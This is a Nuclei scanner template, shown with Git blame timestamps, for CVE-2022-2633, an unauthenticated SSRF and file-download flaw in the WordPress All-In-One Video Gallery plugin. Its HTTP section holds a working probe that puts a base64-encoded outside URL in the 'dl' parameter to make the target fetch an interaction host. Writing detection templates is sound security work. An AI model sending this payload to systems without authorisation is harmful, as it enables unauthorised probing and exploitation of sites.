nuclei-templates/http/cves/2022/CVE-2022-2633.yaml

48 lines
1.6 KiB
YAML
Raw Normal View History

2022-09-28 17:20:46 +00:00
id: CVE-2022-2633
info:
name: All-In-One Video Gallery <=2.6.0 - Server-Side Request Forgery
2022-09-28 17:20:46 +00:00
author: theamanrawat
severity: high
2022-09-28 17:20:46 +00:00
description: |
WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server.
2022-09-28 17:20:46 +00:00
reference:
- https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994
2022-09-29 05:05:17 +00:00
- https://blog.amanrawat.in/2022/09/28/CVE-2022-2633.html
2022-09-28 17:20:46 +00:00
- https://wordpress.org/plugins/all-in-one-video-gallery/
2022-09-29 05:02:08 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-2633
2023-07-11 19:49:27 +00:00
- https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/video.php#L227
2022-09-28 17:20:46 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
2022-09-28 17:20:46 +00:00
cve-id: CVE-2022-2633
2023-08-31 11:46:18 +00:00
cwe-id: CWE-610,CWE-73
epss-score: 0.04403
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.91307
2022-09-28 17:20:46 +00:00
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
framework: wordpress
vendor: plugins360
product: all-in-one_video_gallery
tags: cve2022,wp-plugin,unauth,ssrf,wpscan,cve,wordpress,wp,all-in-one-video-gallery
2022-09-28 17:20:46 +00:00
http:
2022-09-29 07:18:07 +00:00
- raw:
- |
@timeout: 10s
2023-03-09 14:48:32 +00:00
GET /index.php/video/?dl={{base64('https://oast.me/')}} HTTP/1.1
2022-09-29 07:18:07 +00:00
Host: {{Hostname}}
2022-09-28 17:20:46 +00:00
matchers-condition: and
matchers:
2022-09-28 17:34:30 +00:00
- type: word
part: body
words:
2022-09-29 07:18:07 +00:00
- 'Interactsh Server'
2022-09-28 17:20:46 +00:00
2022-09-28 17:34:30 +00:00
- type: status
status:
- 200